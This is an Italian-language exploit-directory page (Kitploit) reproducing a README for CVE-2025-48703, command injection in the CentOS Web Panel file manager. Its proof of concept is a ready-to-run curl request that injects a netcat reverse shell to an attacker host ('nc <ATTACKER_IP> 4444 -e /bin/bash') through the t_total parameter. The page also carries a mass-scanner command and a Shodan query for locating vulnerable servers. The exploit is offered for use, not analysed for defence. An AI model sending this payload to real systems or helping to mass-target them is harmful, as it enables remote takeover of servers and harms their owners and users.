Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-48703 — Esecuzione di codice da remoto nel pannello web CentOS | Kitploit
Strumenti/GitHubGitHub/skynoxk/cve-2025-48703
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlSviluppo Payload
GitHubskynoxk/cve-2025-48703

CVE-2025-48703

Esecuzione di codice da remoto nel pannello web CentOS

Vedi Repository
3131 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🛡️ CVE-2025-48703 - Esecuzione di codice remoto (RCE) in cPanel File Manager

📌 Descrizione

CVE-2025-48703 è una vulnerabilità di esecuzione di codice remoto (RCE) nel modulo filemanager di un pannello di controllo di web hosting (es. cPanel). Si verifica a causa della gestione non sanificata dell'input nella funzione acc=changePerm, che consente a un attaccante di iniettare ed eseguire comandi di sistema arbitrari utilizzando il parametro t_total.


🧨 Impatto

Questa vulnerabilità consente agli attaccanti di:

  • Eseguire comandi arbitrari sul server di destinazione.
  • Stabilire una reverse shell per un accesso persistente.
  • Potenzialmente escalare i privilegi o muoversi lateralmente.

⚠️ Questo attacco può essere eseguito con un'autenticazione minima o, in alcune configurazioni, con accesso non autenticato.


🚀 Prova di concetto (PoC)

✅ Comando per reverse shell

Scarica lo strumento
root@kitploit:~
curl -kis 'https://<TARGET_IP>:2083/myuser/index.php?module=filemanager&acc=changePerm' \
  --data 'fileName=.bashrc&currentPath=/home/myuser&t_total=`nc <ATTACKER_IP> 4444 -e /bin/bash`'

Utilizzo dello scanner

root@kitploit:~
python3 Scanner.py  #Make sure targets.txt is in the same dir

Ricerca Shodan

root@kitploit:~
Server: cwpsrv

Riferimento: https://fenrisk.com/rce-centos-webpanel